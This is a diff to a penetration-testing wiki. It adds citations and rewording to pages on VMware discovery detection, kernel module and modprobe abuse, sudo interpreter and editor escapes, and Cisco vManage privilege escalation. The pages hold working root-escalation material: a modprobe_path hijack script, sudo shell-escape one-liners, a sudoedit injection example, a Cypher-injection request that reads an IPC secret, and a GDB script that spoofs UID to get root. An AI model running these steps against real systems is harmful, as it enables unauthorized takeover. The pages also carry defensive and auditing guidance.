+- Any execution of non-system absolute paths by discovery scripts (look for spaces in ${COMMAND%%...} expansions).<sup>[[1]](#references)[[3]](#references)</sup>
+- ps -ef --forest to visualize ancestry trees: vmtoolsd -> get-versions.sh -> <non-system path>.<sup>[[1]](#references)</sup>
 
 On Aria SDMP (credential-based)
-- Inspect /tmp/VMware-SDMP-Scripts-{UUID}/ for transient scripts and stdout/stderr artifacts showing execution of attacker paths<sup>[[1]](#references)</sup>
+- Inspect /tmp/VMware-SDMP-Scripts-{UUID}/ for transient scripts and stdout/stderr artifacts showing execution of attacker paths.<sup>[[1]](#references)</sup>
 
 Policy/telemetry
 - Alert when privileged collectors execute from non-system prefixes: ^/(tmp|home|var/tmp|dev/shm)/
@@ -116,12 +114,12 @@ Policy/telemetry
 
 ## Mitigations
 
-- Patch: Apply Broadcom/VMware updates for CVE-2025-41244 (Tools and Aria Operations SDMP)<sup>[[2]](#references)</sup>
-- Disable or restrict credential-less discovery where feasible
+- Patch: Apply Broadcom/VMware updates for CVE-2025-41244 (Tools and Aria Operations SDMP).<sup>[[2]](#references)</sup>
+- Disable or restrict credential-less discovery where feasible.<sup>[[1]](#references)</sup>
 - Validate trusted paths: restrict execution to allowlisted directories (/usr/sbin, /usr/bin, /sbin, /bin) and only exact known binaries
-- Avoid permissive regexes with \S; prefer anchored, explicit absolute paths and exact command names
+- Avoid permissive regexes with \S; prefer anchored, explicit absolute paths and exact command names.<sup>[[1]](#references)[[3]](#references)</sup>
 - Drop privileges for discovery helpers where possible; sandbox (seccomp/AppArmor) to reduce impact
-- Monitor for and alert on vmtoolsd/get-versions.sh executing non-system paths
+- Monitor for and alert on vmtoolsd/get-versions.sh executing non-system paths.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ## Notes for defenders and implementers
 

--- a/src/linux-hardening/main-system-information/kernel-modules-and-modprobe.md
+++ b/src/linux-hardening/main-system-information/kernel-modules-and-modprobe.md
@@ -1,10 +1,8 @@
 # Kernel Modules and modprobe Abuse
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Kernel module and module-loading misconfigurations
 
-Kernel module support is a high-impact area during Linux privilege escalation review. Do not treat every unsigned-module message as exploitable by itself, but use it to answer practical questions:
+Kernel module support is a high-impact area during Linux privilege escalation review. Do not treat every unsigned-module message as exploitable by itself, but use it to answer practical questions.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 - Can the current user load modules through `sudo`, capabilities, or a writable helper path?
 - Is module loading still enabled?
@@ -12,13 +10,14 @@ Kernel module support is a high-impact area during Linux privilege escalation re
 - Are module directories or module files writable?
 - Can kernel logs be read to confirm what happened?
 
-Quick triage:
+Quick triage starts with the following module-status, signature, logging, and module-tree checks.<sup>[[1]](#references)[[2]](#references)[[6]](#references)[[8]](#references)</sup>
 
 ```bash
 uname -a
 uname -r
 cat /proc/sys/kernel/modules_disabled 2>/dev/null
-cat /proc/sys/kernel/module_sig_enforce 2>/dev/null
+grep -Eo '(^| )module\.sig_enforce(=[^ ]*)?' /proc/cmdline 2>/dev/null
+grep -E '^(CONFIG_MODULE_SIG|CONFIG_MODULE_SIG_FORCE)=' "/boot/config-$(uname -r)" 2>/dev/null
 cat /proc/sys/kernel/dmesg_restrict 2>/dev/null
 dmesg 2>/dev/null | grep -Ei 'module|signature|taint|verification'
 find /lib/modules/$(uname -r) -type d -writable -ls 2>/dev/null
@@ -27,16 +26,16 @@ find /lib/modules/$(uname -r) -type f -name '*.ko*' -writable -ls 2>/dev/null
 
 Interpretation:
 
-- `modules_disabled=1` means new modules cannot be loaded until reboot.
-- `module_sig_enforce=1` usually blocks unsigned modules.
-- `dmesg_restrict=0` lets unprivileged users read kernel logs on many systems.
-- Writable paths under `/lib/modules/$(uname -r)/` are dangerous because module discovery and auto-loading can trust that tree.
+- `modules_disabled=1` means modules can be neither loaded nor unloaded, and the value cannot be reset to `0` until reboot.<sup>[[1]](#references)</sup>
+- `module.sig_enforce=1` on the kernel command line or `CONFIG_MODULE_SIG_FORCE=y` requires validly signed modules; otherwise, unsigned modules may load and taint the kernel.<sup>[[2]](#references)</sup>
+- `dmesg_restrict=0` imposes no restriction on `dmesg`; when it is `1`, access requires `CAP_SYSLOG`.<sup>[[1]](#references)</sup>
+- Writable paths under `/lib/modules/$(uname -r)/` are dangerous because `modprobe` searches that tree and its dependency data when loading modules.<sup>[[8]](#references)</sup>
 
 ### Loading a module and reading kernel output
 
-If you have legitimate permission to load a local module, `insmod` inserts the exact `.ko` file you provide. The module's init function runs immediately, and messages written with `printk()` appear in kernel logs.
+If you have legitimate permission to load a local module, `insmod` inserts the exact `.ko` file you provide. The module's init function runs as part of the load, and messages written with `printk()` go to the kernel log buffer, which is normally read with `dmesg`.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
-Minimal workflow for review or lab environments:
+A minimal review workflow uses `modinfo` to inspect metadata, `insmod` and `rmmod` to load and remove a module, `lsmod` to confirm loaded state, and `dmesg` to inspect kernel logs.<sup>[[4]](#references)[[6]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 ls -l ./example.ko
@@ -48,7 +47,7 @@ sudo rmmod example
 dmesg | tail -n 30
 ```
 
-If `sudo -l` allows `insmod`, `modprobe`, or a wrapper around them, treat it as critical:
+If `sudo -l` allows `insmod`, `modprobe`, or a wrapper around them, treat it as critical: `sudo -l` lists the invoking user's privileges, and loading a kernel module requires `CAP_SYS_MODULE`.<sup>[[3]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 sudo -l
@@ -57,9 +56,9 @@ sudo /sbin/insmod ./example.ko
 
 ### Sudo-allowed `insmod`
 
-A sudo rule that allows a user to run `insmod` is not comparable to allowing a normal administrative helper. The module's initialization code runs in kernel context as soon as the `.ko` is inserted, so the practical review question is: "can this user choose or modify the module being loaded?"
+A sudo rule that allows a user to run `insmod` is not comparable to allowing a normal administrative helper. The module's initialization code runs as part of insertion, so the practical review question is whether this user can choose or modify the module being loaded.<sup>[[3]](#references)</sup>
 
-Generic review flow:
+The following generic review flow repeats those inspection, load, state, log, and removal checks for a candidate module.<sup>[[4]](#references)[[6]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 sudo -l
@@ -71,9 +70,9 @@ dmesg | tail -n 30
 sudo /sbin/rmmod candidate
 ```
 
-If the user can provide an arbitrary `.ko`, the rule should be treated as full system compromise in an authorized assessment. A safer operational pattern is to avoid delegating module loading through sudo; if it is unavoidable, restrict the exact path, ownership, permissions, signing policy, and removal workflow.
+If the user can provide an arbitrary `.ko`, the rule should be treated as full system compromise in an authorized assessment. A safer operational pattern is to avoid delegating module loading through sudo; if it is unavoidable, restrict the exact path, ownership, permissions, signing policy, and removal workflow.<sup>[[3]](#references)[[10]](#references)</sup>
 
-For a harmless module-building pattern in a controlled lab, a minimal source and Makefile look like:
+For a harmless module-building pattern in a controlled lab, a minimal source and Makefile are shown below; the `make -C /lib/modules/$(uname -r)/build M=$PWD` form follows the kernel's documented kbuild workflow for external modules.<sup>[[5]](#references)[[7]](#references)</sup>
 
 ```c
 #include <linux/module.h>
@@ -103,7 +102,7 @@ clean:
 	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
 ```
 
-Build and load only in an authorized lab:
+Build and load only in an authorized lab; kbuild builds the external module and the load/remove commands invoke the kernel module interfaces.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[7]](#references)</sup>
 
 ```bash
 make
@@ -114,9 +113,9 @@ sudo rmmod demo
 
 ### `kernel.modprobe` / `modprobe_path` abuse checks
 
-`kernel.modprobe` controls the userspace helper the kernel invokes when it needs module-loading assistance. If an attacker can change it to a writable executable path and trigger an unknown binary format or another module request path, it can become root code execution.
+`kernel.modprobe` names the userspace helper the kernel executes for module autoload requests; this sysctl affects autoloading, not explicit module insertion. If an attacker can change it to a writable executable path and trigger a module request, that helper becomes a privileged code-execution path.<sup>[[1]](#references)</sup>
 
-Check the current helper:
+Check the current helper path through the kernel sysctl interface and inspect the target's ownership and mode.<sup>[[1]](#references)</sup>
 
 ```bash
 cat /proc/sys/kernel/modprobe 2>/dev/null
@@ -124,7 +123,7 @@ sysctl kernel.modprobe 2>/dev/null
 ls -l "$(cat /proc/sys/kernel/modprobe 2>/dev/null)" 2>/dev/null
 ```
 
-Check whether you can influence it:
+Check whether the sysctl, delegated sudo rules, or file capabilities can be influenced.<sup>[[1]](#references)[[9]](#references)[[10]](#references)[[15]](#references)</sup>
 
 ```bash
 ls -l /proc/sys/kernel/modprobe
@@ -132,7 +131,9 @@ sudo -l | grep -E 'sysctl|tee|bash|sh|modprobe'
 getcap -r / 2>/dev/null | grep -E 'cap_sys_admin|cap_sys_module'
 ```
 
-Generic lab-only pattern:
+The following lab-only pattern changes the helper path and triggers a documented module-autoload request; use it only on an isolated, authorized system.<sup>[[1]](#references)</sup>
+
+On current Linux kernels, do not use an unknown executable as a generic trigger: legacy custom binary-format module autoloading was removed in Linux 6.14, while the kernel documentation identifies an unknown filesystem type as a module-autoload request path.<sup>[[1]](#references)[[11]](#references)</sup>
 
 ```bash
 # Example only: requires permission to write kernel.modprobe
@@ -140,20 +141,18 @@ printf '#!/bin/sh\nid > /tmp/modprobe-helper-ran\n' > /tmp/helper
 chmod +x /tmp/helper
 echo /tmp/helper | sudo tee /proc/sys/kernel/modprobe
 
-# Trigger an unknown executable format so the kernel attempts helper logic
-printf '\\xff\\xff\\xff\\xff' > /tmp/unknown
-chmod +x /tmp/unknown
-/tmp/unknown 2>/dev/null || true
+# Trigger a documented module-autoload request (requires mount privilege)
+sudo mount -t definitely-not-a-filesystem none /mnt 2>/dev/null || true
 cat /tmp/modprobe-helper-ran 2>/dev/null
 ```
 
-On hardened systems, this should fail because unprivileged users cannot write `kernel.modprobe`, the helper path is not writable, or module-loading paths are blocked.
+On hardened systems, this should fail when permissions prevent unprivileged writes to `kernel.modprobe`, the helper path is not writable, or module autoloading is disabled.<sup>[[1]](#references)</sup>
 
 ### Writable `/lib/modules` review
 
-Writable module directories can allow module replacement, malicious module planting, or auto-load abuse depending on how `modprobe` is later invoked.
+Writable module directories can allow module replacement, malicious module planting, or auto-load abuse depending on how `modprobe` is later invoked; `modprobe` searches `/lib/modules/$(uname -r)` and uses its dependency data when resolving modules.<sup>[[8]](#references)</sup>
 
-Review writable locations:
+Review writable module files and dependency/alias metadata under the active kernel release's module tree.<sup>[[8]](#references)</sup>
 
 ```bash
 KREL="$(uname -r)"
@@ -162,7 +161,7 @@ find "/lib/modules/$KREL" -type f -name '*.ko*' -writable -ls 2>/dev/null
 find "/lib/modules/$KREL" -type f \( -name 'modules.dep' -o -name 'modules.alias' -o -name 'modules.order' \) -writable -ls 2>/dev/null
 ```
 
-If you find writable module content, check how modules are discovered:
+If you find writable module content, inspect how `modprobe` resolves dependencies and how `modinfo` reports module metadata.<sup>[[8]](#references)[[12]](#references)</sup>
 
 ```bash
 modprobe --show-depends <module_name> 2>/dev/null
@@ -172,9 +171,27 @@ grep -R "<module_name>" /lib/modules/$(uname -r)/modules.* 2>/dev/null
 
 Defensive notes:
 
-- Keep `/lib/modules` owned by `root:root` and non-writable by users.
-- Set `kernel.modules_disabled=1` after boot where operationally possible.
-- Enforce module signing on systems that require loadable modules.
-- Monitor writes to `/proc/sys/kernel/modprobe`, `/lib/modules`, and unexpected `insmod`/`modprobe` execution.
+- Keep `/lib/modules` owned by `root:root` and non-writable by users.<sup>[[8]](#references)</sup>
+- Set `kernel.modules_disabled=1` after boot where operationally possible.<sup>[[1]](#references)</sup>
+- Enforce module signing on systems that require loadable modules.<sup>[[2]](#references)</sup>
+- Monitor writes to `/proc/sys/kernel/modprobe`, `/lib/modules`, and unexpected `insmod`/`modprobe` execution.<sup>[[1]](#references)[[8]](#references)</sup>
+
+## References
+
+- [1] [Documentation for /proc/sys/kernel/ — The Linux Kernel documentation](https://docs.kernel.org/admin-guide/sysctl/kernel.html)
+- [2] [Kernel module signing facility — The Linux Kernel documentation](https://www.kernel.org/doc/html/latest/admin-guide/module-signing.html)
+- [3] [init_module(2) — Linux manual page](https://man7.org/linux/man-pages/man2/init_module.2.html)
+- [4] [insmod(8) — Linux manual page](https://man7.org/linux/man-pages/man8/insmod.8.html)
+- [5] [Driver Basics — The Linux Kernel documentation](https://docs.kernel.org/driver-api/basics.html)
+- [6] [Message logging with printk — The Linux Kernel documentation](https://docs.kernel.org/core-api/printk-basics.html)
+- [7] [Building External Modules — The Linux Kernel documentation](https://docs.kernel.org/kbuild/modules.html)
+- [8] [modprobe(8) — Linux manual page](https://man7.org/linux/man-pages/man8/modprobe.8.html)
+- [9] [sudo(8) — Linux manual page](https://man7.org/linux/man-pages/man8/sudo.8.html)
+- [10] [capabilities(7) — Linux manual page](https://man7.org/linux/man-pages/man7/capabilities.7.html)
+- [11] [Merge tag 'execve-v6.14-rc1' — torvalds/linux](https://github.com/torvalds/linux/commit/fadc3ed9ce1cd9ecc5c8be8875f7ec11ab3a7ebe)
+- [12] [modinfo(8) — Linux manual page](https://man7.org/linux/man-pages/man8/modinfo.8.html)
+- [13] [lsmod(8) — Linux manual page](https://man7.org/linux/man-pages/man8/lsmod.8.html)
+- [14] [rmmod(8) — Linux manual page](https://man7.org/linux/man-pages/man8/rmmod.8.html)
+- [15] [getcap(8) — Linux manual page](https://man7.org/linux/man-pages/man8/getcap.8.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/main-system-information/linux-privilege-escalation-checklist.md
+++ b/src/linux-hardening/main-system-information/linux-privilege-escalation-checklist.md
@@ -1,7 +1,5 @@
 # Linux Privilege Escalation Checklist
 
-{{#include ../../banners/hacktricks-training.md}}
-
 # Checklist - Linux Privilege Escalation
 
 
@@ -96,7 +94,7 @@
 ### [SUDO and SUID commands](../linux-basics/linux-privilege-escalation/index.html#sudo-and-suid)
 
 - [ ] Can you execute **any command with sudo**? Can you use it to READ, WRITE or EXECUTE anything as root? ([**GTFOBins**](https://gtfobins.github.io))
-- [ ] If `sudo -l` allows `sudoedit`, check for **sudoedit argument injection** (CVE-2023-22809) via `SUDO_EDITOR`/`VISUAL`/`EDITOR` to edit arbitrary files on vulnerable versions (`sudo -V` < 1.9.12p2). Example: `SUDO_EDITOR="vim -- /etc/sudoers" sudoedit /etc/hosts`<sup>[[1]](#references)</sup>
+- [ ] If `sudo -l` allows `sudoedit`, check for **sudoedit argument injection** (CVE-2023-22809) via `SUDO_EDITOR`/`VISUAL`/`EDITOR` to edit arbitrary files on vulnerable versions (`sudo -V` < 1.9.12p2). Example: `SUDO_EDITOR="vim -- /etc/sudoers" sudoedit /etc/hosts`.<sup>[[1]](#references)</sup>
 - [ ] Is any **exploitable SUID binary**? ([**GTFOBins**](https://gtfobins.github.io))
 - [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](../linux-basics/linux-privilege-escalation/index.html#sudo-execution-bypassing-paths)?
 - [ ] [**Sudo/SUID binary without path indicated**](../linux-basics/linux-privilege-escalation/index.html#sudo-command-suid-binary-without-command-path)?

--- a/src/linux-hardening/main-system-information/sudo-command-abuse.md
+++ b/src/linux-hardening/main-system-information/sudo-command-abuse.md
@@ -1,12 +1,10 @@
 # Sudo Command Abuse
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Sudo-allowed interpreters
 
-If `sudo -l` allows a user to run an interpreter as root, treat it as direct code execution. Interpreters are designed to execute arbitrary code, so a rule that allows `python3`, `perl`, `ruby`, `lua`, `node`, or similar binaries is usually equivalent to root command execution unless the arguments are tightly constrained and validated.
+If `sudo -l` allows a user to run an interpreter as root, treat it as direct code execution. Interpreters are designed to execute arbitrary code, so a rule that allows `python3`, `perl`, `ruby`, `lua`, `node`, or similar binaries is usually equivalent to root command execution unless the arguments are tightly constrained and validated.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[7]](#references)[[9]](#references)[[11]](#references)</sup>
 
-Common review flow:
+Common review flow: first list the user's privileges, then execute a Python statement with the interpreter's `-c` option.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 sudo -l
@@ -14,7 +12,7 @@ sudo /usr/bin/python3 -c 'import os; os.system("id")'
 sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
 ```
 
-Other interpreter examples:
+Other interpreter examples are shown below; the listed interpreters document inline-code execution or child-process APIs.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 sudo /usr/bin/perl -e 'exec "/bin/sh";'
@@ -22,7 +20,7 @@ sudo /usr/bin/ruby -e 'exec "/bin/sh"'
 sudo /usr/bin/node -e 'require("child_process").spawn("/bin/sh", {stdio: [0,1,2]})'
 ```
 
-The exact path matters. If the sudo rule allows `/usr/bin/python3`, use that exact path during validation:
+The exact path matters. If the sudo rule allows `/usr/bin/python3`, use that exact path during validation.<sup>[[2]](#references)</sup>
 
 ```bash
 sudo /usr/bin/python3 -c 'import os; os.setuid(0); os.setgid(0); os.system("/bin/sh")'
@@ -30,9 +28,9 @@ sudo /usr/bin/python3 -c 'import os; os.setuid(0); os.setgid(0); os.system("/bin
 
 ## Sudo-allowed editors
 
-If `sudo -l` allows a user to run an interactive editor as root, treat it as a command-execution surface, not as a harmless file-editing permission. Editors can often execute shell commands, read arbitrary files, write arbitrary files, or invoke external helpers from inside the editor.
+If `sudo -l` allows a user to run an interactive editor as root, treat it as a command-execution surface, not as a harmless file-editing permission. Editors can often execute shell commands, read arbitrary files, write arbitrary files, or invoke external helpers from inside the editor.<sup>[[1]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
-Common review flow:
+Common review flow: list the user's privileges, then invoke each allowed editor or pager under sudo.<sup>[[1]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 sudo -l
@@ -43,37 +41,37 @@ sudo /usr/bin/less /etc/hosts
 
 ### Nano command execution
 
-When `nano` is allowed through sudo, command execution may be reachable from the editor interface:
+When `nano` is allowed through sudo, command execution may be reachable from the editor interface.<sup>[[12]](#references)</sup>
 
 ```text
 Ctrl+R
 Ctrl+X
 ```
 
-Then provide a command such as:
+Then provide a command such as `id` or `/bin/sh` to the nano command prompt.<sup>[[12]](#references)</sup>
 
 ```bash
 id
 /bin/sh
 ```
 
-On some terminals, an interactive shell may need standard streams redirected:
+If an interactive shell does not have usable terminal streams, this redirection form maps its standard output and error to descriptor 0.<sup>[[15]](#references)</sup>
 
 ```bash
 reset; /bin/sh 1>&0 2>&0
 ```
 
-The exact key sequence can vary with nano version and build options, but the security issue is the same: the editor is running as root and can invoke external commands.
+The exact key sequence can vary with nano version and build options, but the security issue is the same: the editor is running as root and can invoke external commands.<sup>[[1]](#references)[[12]](#references)</sup>
 
 ### Other common editor escapes
 
-Vim-style editors commonly expose command execution through `:!`:
+Vim-style editors commonly expose command execution through `:!`.<sup>[[13]](#references)</sup>
 
 ```text
 :!/bin/sh
 ```
 
-Pagers such as `less` can also expose shell execution:
+Pagers such as `less` can also expose shell execution.<sup>[[14]](#references)</sup>
 
 ```text
 !/bin/sh
@@ -81,10 +79,28 @@ Pagers such as `less` can also expose shell execution:
 
 ## Defensive notes
 
-- Avoid granting interpreters or interactive editors through sudo.
-- Prefer fixed, root-owned wrappers that perform one narrow administrative action.
-- If an interpreter is unavoidable, restrict the exact script path and prevent user-controlled arguments, writable imports, `PYTHONPATH`, and unsafe environment preservation.
-- If file editing is required, restrict the exact file path and consider `sudoedit` with patched sudo versions and strict environment handling.
-- Review `SETENV`, `env_keep`, writable working directories, writable module/import paths, `NOEXEC`, `use_pty`, and logging, but do not treat them as a complete sandbox.
+- Avoid granting interpreters or interactive editors through sudo.<sup>[[1]](#references)</sup>
+- Prefer fixed, root-owned wrappers that perform one narrow administrative action.<sup>[[1]](#references)[[2]](#references)</sup>
+- If an interpreter is unavoidable, restrict the exact script path and prevent user-controlled arguments, writable imports, `PYTHONPATH`, and unsafe environment preservation.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
+- If file editing is required, restrict the exact file path and consider `sudoedit` with patched sudo versions and strict environment handling.<sup>[[1]](#references)[[2]](#references)</sup>
+- Review `SETENV`, `env_keep`, writable working directories, writable module/import paths, `NOEXEC`, `use_pty`, and logging, but do not treat them as a complete sandbox.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
+## References
+
+- [1] [sudo(8) — Linux manual page](https://man7.org/linux/man-pages/man8/sudo.8.html)
+- [2] [sudoers(5) — Linux manual page](https://man7.org/linux/man-pages/man5/sudoers.5.html)
+- [3] [Command line and environment — Python documentation](https://docs.python.org/3/using/cmdline.html)
+- [4] [os — Miscellaneous operating system interfaces — Python documentation](https://docs.python.org/3/library/os.html)
+- [5] [perlrun — how to execute the Perl interpreter](https://perldoc.perl.org/perlrun)
+- [6] [exec — Perl documentation](https://perldoc.perl.org/functions/exec)
+- [7] [Ruby command-line options](https://ruby-doc.org/3.4/ruby/options_md.html)
+- [8] [Kernel — Ruby documentation](https://ruby-doc.org/3.4/Kernel.html)
+- [9] [Command-line API — Node.js documentation](https://nodejs.org/api/cli.html)
+- [10] [Child process — Node.js documentation](https://nodejs.org/api/child_process.html)
+- [11] [Lua 5.4 lua man page](https://www.lua.org/manual/5.4/lua.html)
+- [12] [The GNU nano text editor](https://nano-editor.org/manual.html)
+- [13] [Vim: usr_21.txt](https://vimhelp.org/usr_21.txt.html)
+- [14] [less(1) — Linux manual page](https://man7.org/linux/man-pages/man1/less.1.html)
+- [15] [Redirections — Bash Reference Manual](https://www.gnu.org/s/bash/manual/html_node/Redirections.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/network-information/cisco-vmanage.md
+++ b/src/linux-hardening/network-information/cisco-vmanage.md
@@ -1,7 +1,5 @@
 # Cisco - vmanage
 
-{{#include ../../banners/hacktricks-training.md}}
-
 Once you have code execution on Cisco vManage / *Catalyst SD-WAN Manager* as `vmanage`, `netadmin`, or `vmanage-admin`, the most interesting local privesc surfaces are usually the `confd` CLI stack, the `cmdptywrapper` helper, localhost REST APIs, and root-owned import/upload handlers.
 
 If you still need the **initial foothold** on a controller, check the dedicated control-plane page first:
@@ -21,13 +19,13 @@ ls -la /home/vmanage-admin/.ssh 2>/dev/null
 grep -R "tenant-upload\|tenant-list" /opt /usr 2>/dev/null | head
 ```
 
-If `/etc/confd/confd_ipc_secret` is readable from your foothold, Path 1 and Path 2 become immediately practical. If you arrived through a remote info leak or a webshell, also check whether you can already reach `vmanage-admin` SSH material or multitenancy upload handlers: 2026 research showed both were realistic stepping stones.
+If `/etc/confd/confd_ipc_secret` is readable from your foothold, Path 1 and Path 2 become immediately practical. If you arrive via a remote file disclosure or webshell, also inspect `vmanage-admin` SSH material and multitenancy upload handlers; recent research demonstrated both as viable pivots.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ## Path 1
 
-(Example from [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))<sup>[[5]](#references)</sup>
+Synacktiv's vManage assessment documents this root-shell path.<sup>[[5]](#references)</sup>
 
-After digging a little through some [documentation](http://66.218.245.39/doc/html/rn03re18.html) related to `confd` and the different binaries (accessible with an account on the Cisco website), we found that to authenticate the IPC socket, it uses a secret located in `/etc/confd/confd_ipc_secret`:
+The [ConfD documentation](http://66.218.245.39/doc/html/rn03re18.html) linked by the report describes IPC authentication; its vManage example places the secret at `/etc/confd/confd_ipc_secret` and shows it readable by `vmanage`.<sup>[[5]](#references)</sup>
 
 ```
 vmanage:~$ ls -al /etc/confd/confd_ipc_secret
@@ -35,7 +33,7 @@ vmanage:~$ ls -al /etc/confd/confd_ipc_secret
 -rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
 ```
 
-Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability:
+Because Neo4j runs with `vmanage` privileges in the reported setup, the earlier Cypher injection can read the secret file.<sup>[[5]](#references)</sup>
 
 ```
 GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
@@ -49,7 +47,7 @@ Host: vmanage-XXXXXX.viptela.net
 "data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
 ```
 
-The `confd_cli` program does not support command line arguments but calls `/usr/bin/confd_cli_user` with arguments. So, we could directly call `/usr/bin/confd_cli_user` with our own set of arguments. However it's not readable with our current privileges, so we have to retrieve it from the rootfs and copy it using scp, read the help, and use it to get the shell:
+`confd_cli` itself does not accept command-line arguments; it invokes `/usr/bin/confd_cli_user`. The reported workflow extracts that root-readable helper from the rootfs, copies it via `scp`, reads its help, sets `CONFD_IPC_ACCESS_FILE`, and calls it with `-U 0 -G 0` to obtain a root shell.<sup>[[5]](#references)</sup>
 
 ```
 vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
@@ -71,11 +69,11 @@ uid=0(root) gid=0(root) groups=0(root)
 
 ## Path 2
 
-(Example from [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))<sup>[[6]](#references)</sup>
+This alternative route is adapted from Walmart Global Tech's vManage 19.2.2 research.<sup>[[6]](#references)</sup>
 
-The blog<sup>[[5]](#references)</sup> by the synacktiv team described an elegant way to get a root shell, but the caveat is it requires getting a copy of the `/usr/bin/confd_cli_user` which is only readable by root. I found another way to escalate to root without such hassle.
+The Synacktiv path needs a copy of `/usr/bin/confd_cli_user`, which is root-readable in the reported setup; the Walmart report instead alters `confd_cli`'s identity values under GDB.<sup>[[5]](#references)[[6]](#references)</sup>
 
-When I disassembled `/usr/bin/confd_cli` binary, I observed the following:
+The report's disassembly shows `confd_cli` collecting the caller's UID and GID.<sup>[[6]](#references)</sup>
 
 <details>
 <summary>Objdump showing UID/GID collection</summary>
@@ -111,7 +109,7 @@ vmanage:~$ objdump -d /usr/bin/confd_cli
 
 </details>
 
-When I run “ps aux”, I observed the following (_note -g 100 -u 107_)
+The same test showed a root-owned `cmdptywrapper` receiving explicit `-g` and `-u` values.<sup>[[6]](#references)</sup>
 
 ```
 vmanage:~$ ps aux
@@ -120,15 +118,15 @@ root     28644  0.0  0.0   8364   652 ?        Ss   18:06   0:00 /usr/lib/confd/
 … snipped …
 ```
 
-I hypothesized the “confd_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application.
+The researcher inferred that `confd_cli` forwards the logged-in user's UID and GID to `cmdptywrapper`.<sup>[[6]](#references)</sup>
 
-My first attempt was to run the “cmdptywrapper” directly and supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it.
+Running `cmdptywrapper` directly with `-g 0 -u 0` failed because the required file descriptor (`-i 1015` in the example) was not available.<sup>[[6]](#references)</sup>
 
-As mentioned in synacktiv’s blog(last example), the `confd_cli` program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system.
+Because `confd_cli` does not expose those values as arguments, the report uses GDB to override the `getuid()` and `getgid()` return values; GDB was present on that appliance.<sup>[[5]](#references)[[6]](#references)</sup>
 
-I created a GDB script where I forced the API `getuid` and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the `/etc/confd/confd_ipc_secret` directly.
+With `vmanage` access, the test could read `/etc/confd/confd_ipc_secret`; the following script forces both identity calls to return zero.<sup>[[6]](#references)</sup>
 
-root.gdb:
+The GDB script used in the report is:<sup>[[6]](#references)</sup>
 
 ```
 set environment USER=root
@@ -148,7 +146,7 @@ end
 run
 ```
 
-Console Output:
+The reported console output is:<sup>[[6]](#references)</sup>
 
 <details>
 <summary>Console output</summary>
@@ -191,16 +189,16 @@ bash-4.4#
 
 ## Path 3 (2025 CLI input validation bug - CVE-2025-20122)
 
-Cisco later documented a cleaner local root path in its own advisory for [CVE-2025-20122](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-priviesc-WCk7bmmt): an **authenticated attacker with only read-only privileges** could send a crafted request to the manager CLI and jump to root because of insufficient input validation.<sup>[[7]](#references)</sup>
+Cisco later documented a cleaner local root path in its own advisory for [CVE-2025-20122](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-priviesc-WCk7bmmt). An **authenticated attacker with only read-only privileges** could send a crafted request to the manager CLI and gain root because of insufficient input validation.<sup>[[7]](#references)</sup>
 
-From an offensive perspective, this is the important takeaway:
+From an offensive perspective, this advisory and the earlier CLI research suggest the following workflow.<sup>[[6]](#references)[[7]](#references)</sup>
 
 1. Once you have *any* low-priv foothold on the box, you should test the local CLI service before going for the heavier Path 1 / Path 2 workflow.
 2. Reuse the artifacts from Path 2 to find the trust boundary: `confd_cli` → `cmdptywrapper` → `vshell`.
 3. Treat every field forwarded to the CLI backend as suspicious: UID/GID, username, terminal metadata, imported files, or any value later consumed by a root-owned helper.
 4. If a low-priv user can reach the local CLI socket and influence those fields, root may be only one crafted request away.
 
-A practical workflow after landing on the appliance is:
+After landing on the appliance, inspect the local CLI chain as follows.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
